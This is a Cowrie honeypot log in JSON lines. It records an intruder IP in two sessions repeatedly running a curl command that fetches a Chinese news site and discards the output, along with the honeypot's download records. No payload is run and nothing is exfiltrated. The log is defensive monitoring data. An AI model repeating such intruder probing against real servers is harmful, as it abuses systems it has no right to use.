{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:54.801743Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:54.810143Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:54.814717Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:54.815864Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:54.838634Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:54.839682Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:54.852483Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:54.853425Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:54.858524Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:54.876579Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:54.877551Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:54.881751Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:54.893840Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:54.895172Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:54.905296Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:54.913453Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:54.914310Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:54.919837Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:54.925968Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:54.933770Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:54.935023Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:54.944558Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:54.955591Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:54.956537Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:54.957331Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:54.980191Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:54.981219Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:54.991522Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:54.992603Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:55.003030Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:55.018416Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:55.019844Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:55.023452Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:55.027823Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:55.029872Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:55.031037Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:55.039254Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:55.059459Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:55.060573Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:55.070035Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:55.071066Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:55.100663Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:55.101811Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:55.107240Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:55.108245Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:55.116306Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:55.120633Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:55.142290Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:55.143940Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:55.145115Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:55.148917Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:55.150089Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:55.168040Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:55.171051Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:55.183701Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:55.184795Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:55.188440Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:55.189435Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:55.206649Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:55.223128Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:55.224047Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:55.226007Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:55.226914Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:55.235816Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:55.243370Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:55.261179Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:55.262340Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:55.265151Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:55.265952Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:55.276684Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:55.296134Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:55.299555Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:55.300468Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:55.303168Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:55.303897Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:55.325935Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:55.337929Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:55.339018Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:55.341040Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:55.342409Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:55.371019Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:55.378255Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:55.379023Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:55.381317Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:55.382147Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:55.384454Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:55.399351Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:55.417101Z","src_ip":"212.227.125.160","session":"7541ed730449"}
